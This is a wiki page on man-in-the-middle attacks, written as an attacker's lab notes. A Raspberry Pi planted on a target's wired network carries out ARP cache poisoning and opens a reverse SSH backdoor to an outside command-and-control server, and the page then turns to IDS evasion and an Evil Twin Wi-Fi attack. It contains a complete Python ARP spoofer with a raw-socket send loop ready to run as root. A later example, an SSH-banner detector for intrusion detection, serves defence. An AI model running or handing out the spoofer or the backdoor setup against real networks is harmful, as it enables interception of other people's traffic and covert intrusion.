MITM
From charlesreid1
What It Is
A man-in-the-middle (MITM) attack is a general concept from cryptography and network security. Two parties, Alice and Bob, try to have an encrypted conversation, but an attacker, Eve, gets in the middle: Alice negotiates one encryption key with Eve (believing Eve is Bob), and Bob negotiates a different key with Eve (believing Eve is Alice). Eve decrypts each message with one key, reads or alters it, and re-encrypts it with the other, so both ends see a working encrypted channel and nothing looks wrong. The attack succeeds whenever Alice and Bob have no way to verify that the key they hold really belongs to the other party, which is why authenticated key exchange (certificates, pre-shared keys, SSH host key fingerprints) matters.
Wired Network
Trying a man-in-the-middle attack with ARP spoofing on a wired network. The configuration:

    +----[Target laptop]
    |
    |
    +---[Raspberry Pi]
    |
    |
    |
    [Router]
How It Will Work
This (wired) man-in-the-middle attack works by ARP spoofing (ARP cache poisoning). The Pi sends forged ARP replies in both directions: it tells the target that the router's IP address lives at the Pi's own MAC address, and it tells the router that the target's IP address lives at the Pi's MAC address. Neither host checks whether it ever asked, so both ARP caches are overwritten and the switch now delivers target-to-router traffic (and the replies) to the Pi. The Pi forwards the packets on, reading or modifying them in transit; IP forwarding must be enabled on the Pi (net.ipv4.ip_forward=1), otherwise the target just loses its connection and the attack is noticed. The forged replies have to be re-sent every few seconds, because ARP cache entries expire.
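The two forged ARP replies described above, as an added example that is not the wiki's own code. It builds the raw Ethernet/ARP frames with only the Python standard library, parses them back the way the victim's kernel (or an IDS) would, and shows the effect on a naive ARP cache. The MAC and IP addresses, the interface name eth0 and the 192.168.1.0/24 addressing are made-up values for illustration; actually transmitting the frames needs root on a Linux host.

```python
"""Forged ARP 'is-at' replies for the wired ARP-cache-poisoning setup.

Added example, not the wiki's own code.  All addresses below are
constructed sample values, not taken from the original page.
"""
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2

# Constructed sample addresses (assumed, not from the original page).
PI_MAC = "b8:27:eb:00:00:01"
PI_IFACE = "eth0"
TARGET_MAC, TARGET_IP = "00:11:22:33:44:55", "192.168.1.50"
ROUTER_MAC, ROUTER_IP = "aa:bb:cc:dd:ee:ff", "192.168.1.1"


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Ethernet II frame carrying an ARP reply (opcode 2).

    The lie is in sender_mac/sender_ip: the receiver caches
    sender_ip -> sender_mac without checking that it ever sent a request.
    """
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s",
                      1,        # hardware type: Ethernet
                      0x0800,   # protocol type: IPv4
                      6, 4,     # hardware / protocol address lengths
                      ARP_REPLY,
                      mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode an ARP frame: what the victim's kernel, or an IDS, sees."""
    if len(frame) < 42:  # 14-byte Ethernet header + 28-byte ARP body
        raise ValueError("short frame")
    _, _, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        raise ValueError("not ARP")
    _, _, _, _, op, smac, sip, tmac, tip = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {"op": op,
            "sender_mac": smac.hex(":"), "sender_ip": socket.inet_ntoa(sip),
            "target_mac": tmac.hex(":"), "target_ip": socket.inet_ntoa(tip)}


def poison_frames() -> dict:
    """Both halves of the attack: the target is told the router is at the
    Pi's MAC, and the router is told the target is at the Pi's MAC."""
    return {
        "to_target": build_arp_reply(PI_MAC, ROUTER_IP, TARGET_MAC, TARGET_IP),
        "to_router": build_arp_reply(PI_MAC, TARGET_IP, ROUTER_MAC, ROUTER_IP),
    }


def apply_to_cache(cache: dict, frame: bytes) -> dict:
    """Model of a naive ARP cache: any reply overwrites the mapping."""
    arp = parse_arp(frame)
    if arp["op"] == ARP_REPLY:
        cache[arp["sender_ip"]] = arp["sender_mac"]
    return cache


def send_forever(interval: float = 2.0) -> None:
    """Re-send both replies every few seconds so the poisoned entries
    never expire.  Needs root and a Linux AF_PACKET socket, plus
    'sysctl net.ipv4.ip_forward=1' on the Pi or the target loses connectivity."""
    import time
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, ETH_P_ARP)
    sock.bind((PI_IFACE, 0))
    frames = poison_frames()
    while True:
        for frame in frames.values():
            sock.send(frame)
        time.sleep(interval)


if __name__ == "__main__":
    target_cache = {ROUTER_IP: ROUTER_MAC}          # what the laptop knows before
    apply_to_cache(target_cache, poison_frames()["to_target"])
    print("target now thinks the router is at", target_cache[ROUTER_IP])
    # send_forever()  # uncomment on the Pi, as root, to run the attack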
Preparing the Pi
First, plug the Pi into the router.
Getting a Reverse Shell to the Pi
See the RaspberryPi/Reverse SSH page for instructions on creating a startup script on the Raspberry Pi that opens a reverse SSH connection to an outside command and control server. Because the Pi initiates the connection, it works from behind the target network's router and firewall, and it gives you a backdoor SSH shell onboard the Raspberry Pi. Hooray!
Circumventing IDS
Intrusion detection systems can identify SSH traffic by its protocol fingerprint rather than by port number: every SSH connection opens with a plaintext identification banner (SSH-2.0-... followed by the software version, per RFC 4253) before any key exchange happens, and the key exchange itself has a recognisable shape. Moving the reverse shell from port 22 to port 443 or 80 therefore does not by itself hide it from a protocol-aware IDS.
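To make the point concrete, here is the kind of check a protocol-aware IDS runs, as an added example (not the wiki's code and not any particular IDS's rule set). It looks at the first bytes of each TCP stream, matches the SSH identification string from RFC 4253 section 4.2 regardless of the destination port, and tells SSH apart from TLS and HTTP. The flows are constructed sample data; only the standard library is used.

```python
"""Port-independent SSH detection on the first bytes of a TCP stream.

Added example, not from the wiki.  SAMPLE_FLOWS is constructed data.
"""
import re

# RFC 4253 4.2: "SSH-" protoversion "-" softwareversion [SP comments] CR LF.
# softwareversion is printable US-ASCII with no whitespace and no '-';
# the whole line is at most 255 bytes including CR LF.
SSH_BANNER = re.compile(rb"^SSH-(\d+\.\d+)-([\x21-\x2c\x2e-\x7e]+)( [\x20-\x7e]*)?\r?\n")


def classify_payload(first_bytes: bytes) -> str:
    """Return 'ssh', 'tls', 'http' or 'unknown' from the start of a stream."""
    if SSH_BANNER.match(first_bytes[:255]):
        return "ssh"
    if first_bytes.startswith(b"\x16\x03"):  # TLS record type 22 (handshake)
        return "tls"
    if re.match(rb"^[A-Z]{3,7} \S+ HTTP/1\.[01]\r\n", first_bytes):
        return "http"
    return "unknown"


def flag_ssh_flows(flows) -> list:
    """flows: iterable of (src_ip, dst_port, first_payload_bytes).

    Returns one alert per SSH stream; the port only affects the wording,
    never the decision, which is exactly why changing ports does not help.
    """
    alerts = []
    for src, dport, payload in flows:
        if classify_payload(payload) == "ssh":
            tag = "" if dport == 22 else " (non-standard port)"
            alerts.append({"src": src, "dport": dport,
                           "note": "SSH on port %d%s" % (dport, tag)})
    return alerts


# Constructed sample flows: (src_ip, dst_port, first bytes sent by the client).
SAMPLE_FLOWS = [
    ("10.0.0.7", 22,  b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3\r\n"),
    ("10.0.0.7", 443, b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3\r\n"),  # reverse shell hiding on 443
    ("10.0.0.8", 443, b"\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03"),  # genuine TLS ClientHello
    ("10.0.0.9", 80,  b"GET / HTTP/1.1\r\nHost: example\r\n\r\n"),
]

if __name__ == "__main__":
    for alert in flag_ssh_flows(SAMPLE_FLOWS):
        print(alert)
```

The banner is sent before the first key exchange, so it is always in the clear on the wire; the only way to hide it from this check is to wrap the SSH session inside another protocol, which is a different problem from picking a port.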
Wireless Network
To conduct a man-in-the-middle attack over wifi, we'll need to set things up in one of a couple of different ways.
I'll cover the Evil Twin attack, where the attacker impersonates a legitimate access point (same SSID, usually with a stronger signal) in order to trick a sheep into connecting to it instead. Because the sheep's traffic then passes through hardware the attacker controls, the attacker can carry out a man-in-the-middle attack without any ARP tricks at all.